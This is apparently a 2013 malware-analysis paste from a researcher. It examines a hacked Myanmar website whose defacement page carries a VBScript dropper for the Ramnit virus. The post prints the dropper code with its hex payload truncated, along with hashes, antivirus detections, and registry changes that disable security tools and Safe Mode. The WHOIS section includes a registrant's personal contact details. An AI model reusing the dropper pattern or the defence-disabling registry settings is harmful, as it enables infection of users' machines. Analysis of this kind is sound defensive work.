Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # MalwareMustDie! @unixfreaxjp /malware]$ date
- # Sat Mar 2 15:33:51 JST 2013
- # Case: ...And the Hack Group Re-using the old-timer Malware..
- # in this case: RAMNIT!!
- // The below domain was just hacked....
- Domain Name: MYANWEBS.COM
- Registrar: GODADDY.COM, LLC
- Registered through: GoDaddy.com, LLC (http://www.godaddy.com)
- Domain Name: MYANWEBS.COM
- Created on: 29-Nov-10
- Expires on: 29-Nov-13
- Last Updated on: 06-Nov-12
- Registrant:
- TKT Web Studio
- No.45, Shwe Ta Chaung Road, Pyay, Pegu
- Yangon, NA, Myanmar
- Administrative/Technical Contact:
- AUNG, KYAW KYAW kyawkyaw26273@gmail.com
- TKT Web Studio
- No.45, Shwe Ta Chaung Road, Pyay, Pegu
- Yangon, NA
- Myanmar
- +95.5326506
- Domain servers in listed order:
- NS1.MYANWEBS.COM NS2.MYANWEBS.COM
- NS3.MYANWEBS.COM NS4.MYANWEBS.COM
- NS5.MYANWEBS.COM
- // The hacked domains spread by the below URL...
- h00p://penjaga123.myanwebs.com/
- // Let's check it out....
- // fetch and checks...
- --2013-03-02 14:42:02-- h00p://penjaga123.myanwebs.com/
- Resolving penjaga123.myanwebs.com... seconds 0.00, 209.51.196.242
- Caching penjaga123.myanwebs.com => 209.51.196.242
- Connecting to penjaga123.myanwebs.com|209.51.196.242|:80... seconds 0.00, connected.
- :
- GET / HTTP/1.0
- Referer: http://malwaremustdie.blogspot.com
- User-Agent: MalwareMustDie Still Banging Malware Moronz!
- Host: penjaga123.myanwebs.com
- HTTP request sent, awaiting response...
- :
- HTTP/1.0 200 OK
- Date: Sat, 02 Mar 2013 05:41:45 GMT
- Server: ATS/3.2.0
- Cache-Control: no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform
- Expires: Sat, 02 Mar 2013 05:41:45 GMT
- Vary: Accept-Encoding,User-Agent
- Pragma: no-cache
- Content-Type: text/html
- Age: 2
- Connection: close
- :
- 200 OK
- Length: unspecified [text/html]
- Saving to: `index.html'
- 2013-03-02 14:42:09 (140 KB/s) - `index.html' saved [824550]
- // looks like this... (elinks)
- [lol.gif]
- #OPWorld
- __________________________________________________________________________________________
- __________________________________________________________________________________________
- hello world ..
- This is the operation for the country of Myanmar.
- Do not have the name of religion to carry out attacks on our site!
- Our silence is not because we are weak,
- we only demand retribution for our site that you hack ..
- Lamers you simply useless! Our army is god ..
- without insulting religion and your beliefs.
- This is our way!
- Thank's: Legend Irhabi007 - Hmei7 - Syntax_error - 3vil666 - Bocah Netter -
- Drac Code 101 - Mujahidin Cyber // animated...
- __________________________________________________________________________________________
- __________________________________________________________________________________________
- IFRAME: h00p://w.soundcloud.com/player/?url=http%3A%2F%2Fapi.soundcloud.com%2Ftracks%2F80972118&auto_play=true&show_artwork=true&color=ff7700
- // some f*ckin music...
- // Using below METAs:
- <meta name="revisit-after" content="3">
- <meta name="rating" content="general">
- <meta name="classification" content="Internet Services">
- <meta name="googlebot" content="index,follow">
- <meta name="google rank" content="1">
- <meta name="robots" content="all">
- <meta name="robots schedule" content="auto">
- // Saved the malware binary into the PC as svchost.exe via VBScript
- // method: CreateObject("Scripting.FileSystemObject")
- //
- // And run it by using the Windows Script WScript.Shell.Run...
- <SCRIPT Language=VBScript><!--
- DropFileName = "svchost.exe"
- WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000
- 000000000000000000000000000000000000000000000000000000000000000E800000
- 00E1FBA0E00B409CD21B80120444F53206D6F64652E0D0D0A2400000000000000D72D8
- :
- :
- 83B00C8B43A419EA051319A4422C6694D6B9006D4C6BFA184413161CDB446B9B5816E556
- 47B2B925A289418B2F487D4B8E713A64E68F01A930573A8B1B5BD2C84C0720CCB99C5915
- 62791956C46A1352C2B8DB97C0B643016782B16B5F3FEC20D28029FB257E1208E92338BB
- A8B1CCBF43994903D0831640459BE377D495BF10A5341C85CCA36FBDA94A1D37279AFEBF
- 34F996CAB780F9D948558655C4B019DAF9F4F6100EC46591F2024F9263448E14178B9DBB
- 44CA67E42C9B151B938631D3FCD4401FCCAB15106DBB151"
- Set FSO = CreateObject("Scripting.FileSystemObject")
- DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
- If FSO.FileExists(DropPath)=False Then
- Set FileObj = FSO.CreateTextFile(DropPath, True)
- For i = 1 To Len(WriteData) Step 2
- FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
- Next
- FileObj.Close
- End If
- Set WSHshell = CreateObject("WScript.Shell")
- WSHshell.Run DropPath, 0
- //--></SCRIPT>
- // dropped binary;
- MD5 : e450435280ba806dc2d8115b172e1e40
- SHA256 : 3c3bda34253d238f78bf7915982956d872bcdc4f21e92287e462e7e8d976abe8
- Sections:
- .text 0x1000 0x2200 8704
- .data 0x4000 0x9730 4608
- .rsrc 0xe000 0x78c 2048
- .rdata 0xf000 0x1ae0f 108559
- kgoodcb 0x2a000 0x13000 77824 <==== need depacked/decode
- .text 0x3d000 0x33000 205824 <=== need depacked/decode
- Entry Point at 0x31a00
- Virtual Address is 0x43d000
- CRC Fail: Claimed: 0, Actual: 416781
- Compile Time: 0x40617B91 [Wed Mar 24 12:14:09 2004 UTC]
- // Faking Adobe software...
- LangID: 040904b0
- LegalCopyright: Copyright \xa9 1996-2003 Macromedia, Inc.
- InternalName: Macromedia Flash Player 7.0
- FileVersion: 7,0,19,0
- CompanyName: Macromedia, Inc.
- LegalTrademarks: Macromedia Flash Player
- ProductName: Shockwave Flash
- ProductVersion: 7,0,19,0
- FileDescription: Macromedia Flash Player 7.0 r19
- OriginalFilename: SAFlashPlayer.exe
- // Hex:
- 0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
- 0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
- 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
- 0030 00 00 00 00 00 00 00 00 00 00 00 00 E8 00 00 00 ................
- 0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
- 0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
- 0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
- 0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
- 0080 D7 2D 86 2D 93 4C E8 7E 93 4C E8 7E 93 4C E8 7E .-.-.L.~.L.~.L.~
- 0090 8F 03 B7 7E 91 4C E8 7E 9C 74 88 7E D3 4D E8 7E ...~.L.~.t.~.M.~
- 00A0 C6 44 B3 7E 8E 4C E8 7E A0 CB E7 7E 92 4C E8 7E .D.~.L.~...~.L.~
- 00B0 50 43 B7 7E B1 4C E8 7E 83 38 B2 7E 9F 4C E8 7E PC.~.L.~.8.~.L.~
- 00C0 3A C2 B5 7E 92 4C E8 7E 52 69 63 68 93 4C E8 7E :..~.L.~Rich.L.~
- 00D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
- 00E0 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 06 00 ........PE..L...
- 00F0 91 7B 61 40 00 00 00 00 00 00 00 00 E0 00 0F 01 .{a@............
- 0100 0B 01 06 04 00 22 00 00 00 E0 01 00 00 08 00 00 ....."..........
- 0110 00 D0 03 00 00 10 00 00 00 40 00 00 00 00 40 00 .........@....@.
- 0120 00 10 00 00 00 02 00 00 04 00 00 00 05 00 01 00 ................
- 0130 04 00 00 00 00 00 00 00 00 00 07 00 00 04 00 00 ................
- 0140 00 00 00 00 02 00 00 80 00 00 40 00 00 60 00 00 ..........@..`..
- 0150 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 ..@.............
- 0160 00 00 00 00 00 00 00 00 AC 16 00 00 A0 00 00 00 ................
- 0170 00 E0 00 00 8C 07 00 00 D0 43 00 00 18 00 00 00 .........C......
- 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
- 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
- 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
- 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
- 01C0 00 10 00 00 B0 01 00 00 00 00 00 00 00 00 00 00 ................
- 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
- 01E0 2E 74 65 78 74 00 00 00 00 22 00 00 00 10 00 00 .text...."......
- // Quick Check Reputation on Virus Total...
- URL: https://www.virustotal.com/en/file/3c3bda34253d238f78bf7915982956d872bcdc4f21e92287e462e7e8d976abe8/analysis/1362204046/
- SHA256: 3c3bda34253d238f78bf7915982956d872bcdc4f21e92287e462e7e8d976abe8
- SHA1: 823cb691fa3193ff7bb7fd071acf9d1f68edf527
- MD5: e450435280ba806dc2d8115b172e1e40
- File size: 399.9 KB ( 409536 bytes )
- File name: SAFlashPlayer.exe
- File type: Win32 EXE
- Tags: peexe
- Detection: 41 / 46
- Analysis: 2013-03-02 06:00:46 UTC ( 5 minutes ago )
- Malware Names:
- nProtect : Virus/W32.SpyEye
- CAT-QuickHeal : W32.Ramnit.A
- McAfee : W32/Ramnit.a
- Malwarebytes : Trojan.Downloader
- K7AntiVirus : Virus
- Agnitum : Win32.Sality.BK
- F-Prot : W32/Ramnit.D
- Symantec : Packed.Protexor!gen1
- Norman : Sality.ZHB
- TotalDefense : Win32/Ramnit.C
- TrendMicro-HouseCall : PE_RAMNIT.DEN
- Avast : Win32:RmnDrp
- ClamAV : W32.Ramnit-3
- Kaspersky : Virus.Win32.Nimnul.a
- BitDefender : Win32.Ramnit.N
- NANO-Antivirus : Virus.Win32.Nimnul.bmnup
- ViRobot : Win32.Nimnul.A
- Emsisoft : Win32.Ramnit.N (B)
- Comodo : Virus.Win32.Ramnit.K
- F-Secure : Win32.Ramnit.N
- DrWeb : Win32.Rmnet.8
- VIPRE : Virus.Win32.Ramnit.b (v)
- AntiVir : W32/Ramnit.C
- TrendMicro : PE_RAMNIT.DEN
- McAfee-GW-Edition : Heuristic.BehavesLike.Win32.Suspicious-BAY.K
- Sophos : W32/Ramnit-A
- Jiangmin : Win32/IRCNite.wi
- Kingsoft : Win32.Ramnit.lx.30720
- Microsoft : Virus:Win32/Ramnit.I
- SUPERAntiSpyware : Trojan.Agent/Gen-Pune
- GData : Win32.Ramnit.N
- Commtouch : W32/Ramnit.D
- AhnLab-V3 : Win32/Ramnit.I
- VBA32 : Virus.Win32.Nimnul.b
- PCTools : HeurEngine.Protexor
- ESET-NOD32 : Win32/Ramnit.H
- Rising : Win32.Mgr.a
- Ikarus : Virus.Win32.Ramnit
- Fortinet : W32/Ramnit.C
- AVG : Win32/Zbot.G
- Panda : W32/Nimnul.A
- // Malware Created / Overwrited files:
- C:\Documents and Settings\User\Local Settings\Temp\winncbnga.exe
- C:\Program Files\Microsoft\WaterMark.exe
- C:\TEST\samplemgr.exe
- C:\WINDOWS\system32\dmlconf.dat
- C:\WINDOWS\system.ini
- // Kicked-off processes...
- 0x1dc WaterMark.exe C:\Program Files\Microsoft\WaterMark.exe
- 0x1e4 WaterMark.exe C:\Program Files\Microsoft\WaterMark.exe
- 0x20c svchost.exe C:\WINDOWS\system32\svchost.exe // this binary..
- 0x210 svchost.exe C:\WINDOWS\system32\svchost.exe // this binary..
- // Loaded SYS/driver
- \SystemRoot\System32\Drivers\Fastfat.SYS
- // all of these registry are deleted....
- HKLM\System\CurrentControlSet\Control\SafeBoot\AlternateShell REG_SZ 16 "cmd.exe"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{36FC9E60-C465-11CF-8056-444553540000}\ REG_SZ 66 "Universal Serial Bus controllers"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E965-E325-11CE-BFC1-08002BE10318}\ REG_SZ 26 "CD-ROM Drive"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}\ REG_SZ 20 "DiskDrive"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E969-E325-11CE-BFC1-08002BE10318}\ REG_SZ 64 "Standard floppy disk controller"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96A-E325-11CE-BFC1-08002BE10318}\ REG_SZ 8 "Hdc"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96B-E325-11CE-BFC1-08002BE10318}\ REG_SZ 18 "Keyboard"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96F-E325-11CE-BFC1-08002BE10318}\ REG_SZ 12 "Mouse"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E977-E325-11CE-BFC1-08002BE10318}\ REG_SZ 32 "PCMCIA Adapters"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97B-E325-11CE-BFC1-08002BE10318}\ REG_SZ 24 "SCSIAdapter"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97D-E325-11CE-BFC1-08002BE10318}\ REG_SZ 14 "System"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E980-E325-11CE-BFC1-08002BE10318}\ REG_SZ 36 "Floppy disk drive"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\ REG_SZ 14 "Volume"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\ REG_SZ 48 "Human Interface Devices"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\AppMgmt\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Base\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Boot Bus Extender\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Boot file system\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\CryptSvc\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\DcomLaunch\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmadmin\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmboot.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmio.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmload.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmserver\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\EventLog\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\File system\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Filter\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\HelpSvc\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Netlogon\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\PCI Configuration\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\PlugPlay\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\PNP Filter\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Primary disk\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\RpcSs\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\SCSI Class\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\sermouse.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\sr.sys\ REG_SZ 50 "FSFilter System Recovery"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\SRService\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\System Bus Extender\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\vga.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\vgasave.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\WinMgmt\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\ REG_SZ 66 "Universal Serial Bus controllers"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\ REG_SZ 26 "CD-ROM Drive"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\ REG_SZ 20 "DiskDrive"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\ REG_SZ 64 "Standard floppy disk controller"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\ REG_SZ 8 "Hdc"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\ REG_SZ 18 "Keyboard"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\ REG_SZ 12 "Mouse"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\ REG_SZ 8 "Net"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\ REG_SZ 20 "NetClient"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\ REG_SZ 22 "NetService"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\ REG_SZ 18 "NetTrans"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\ REG_SZ 32 "PCMCIA Adapters"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\ REG_SZ 24 "SCSIAdapter"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\ REG_SZ 14 "System"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\ REG_SZ 36 "Floppy disk drive"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\ REG_SZ 14 "Volume"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\ REG_SZ 48 "Human Interface Devices"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\AFD\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\AppMgmt\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Base\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Boot Bus Extender\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Boot file system\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Browser\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\CryptSvc\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\DcomLaunch\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Dhcp\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmadmin\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmserver\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\DnsCache\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\EventLog\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\File system\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Filter\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\HelpSvc\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\LanmanServer\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\LanmanWorkstation\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\LmHosts\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Messenger\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NDIS Wrapper\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NDIS\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Ndisuio\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetBIOS\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetBIOSGroup\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetBT\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetDDEGroup\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Netlogon\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetMan\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Network\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetworkProvider\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NtLmSsp\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PCI Configuration\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PlugPlay\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PNP Filter\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PNP_TDI\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Primary disk\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdsessmgr\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\RpcSs\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\SCSI Class\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\SharedAccess\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\sr.sys\ REG_SZ 50 "FSFilter System Recovery"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\SRService\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Streams Drivers\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\System Bus Extender\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Tcpip\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\TDI\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\termservice\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\vga.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\WinMgmt\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\WZCSVC\ REG_SZ 16 "Service"
- // Registry New Added Key/Values:
- HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline REG_DWORD 4 0x0
- HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools REG_DWORD 4 0x1
- HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgr REG_DWORD 4 0x1
- HKLM\Software\Microsoft\Security Center\Svc\AntiVirusDisableNotify REG_DWORD 4 0x1
- HKLM\Software\Microsoft\Security Center\Svc\AntiVirusOverride REG_DWORD 4 0x1
- HKLM\Software\Microsoft\Security Center\Svc\FirewallDisableNotify REG_DWORD 4 0x1
- HKLM\Software\Microsoft\Security Center\Svc\FirewallOverride REG_DWORD 4 0x1
- HKLM\Software\Microsoft\Security Center\Svc\UacDisableNotify REG_DWORD 4 0x1
- HKLM\Software\Microsoft\Security Center\Svc\UpdatesDisableNotify REG_DWORD 4 0x1
- HKLM\Software\Microsoft\Security Center\UacDisableNotify REG_DWORD 4 0x1
- HKLM\Software\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA REG_DWORD 4 0x0
- HKLM\System\CurrentControlSet\Services\amsint32\DisplayName REG_SZ 18 "amsint32"
- HKLM\System\CurrentControlSet\Services\amsint32\Enum\0 REG_SZ 52 "Root\LEGACY_AMSINT32\0000"
- HKLM\System\CurrentControlSet\Services\amsint32\Enum\Count REG_DWORD 4 0x1
- HKLM\System\CurrentControlSet\Services\amsint32\Enum\NextInstance REG_DWORD 4 0x1
- HKLM\System\CurrentControlSet\Services\amsint32\ErrorControl REG_DWORD 4 0x1
- HKLM\System\CurrentControlSet\Services\amsint32\ImagePath REG_EXPAND_SZ 84 "C:\WINDOWS\system32\drivers\iurln.sys"
- HKLM\System\CurrentControlSet\Services\amsint32\Security\Security REG_BINARY 168 ?
- HKLM\System\CurrentControlSet\Services\amsint32\Start REG_DWORD 4 0x3
- HKLM\System\CurrentControlSet\Services\amsint32\Type REG_DWORD 4 0x1
- HKLM\System\CurrentControlSet\Services\IpFilterDriver\Enum\0 REG_SZ 64 "Root\LEGACY_IPFILTERDRIVER\0000"
- HKLM\System\CurrentControlSet\Services\IpFilterDriver\Enum\Count REG_DWORD 4 0x1
- HKLM\System\CurrentControlSet\Services\IpFilterDriver\Enum\NextInstance REG_DWORD 4 0x1
- HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Program Files\Microsoft\WaterMark.exe REG_SZ 114 "C:\Program Files\Microsoft\WaterMark.exe:*:Enabled:ipsec"
- HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:%MALWARESAMPLE% REG_SZ 70 "C:\TEST\sample.exe:*:Enabled:ipsec"
- HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications REG_DWORD 4 0x1
- HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions REG_DWORD 4 0x0
- ----
- #MalwareMustDie!
- @unixfreaxjp
Add Comment
Please, Sign In to add comment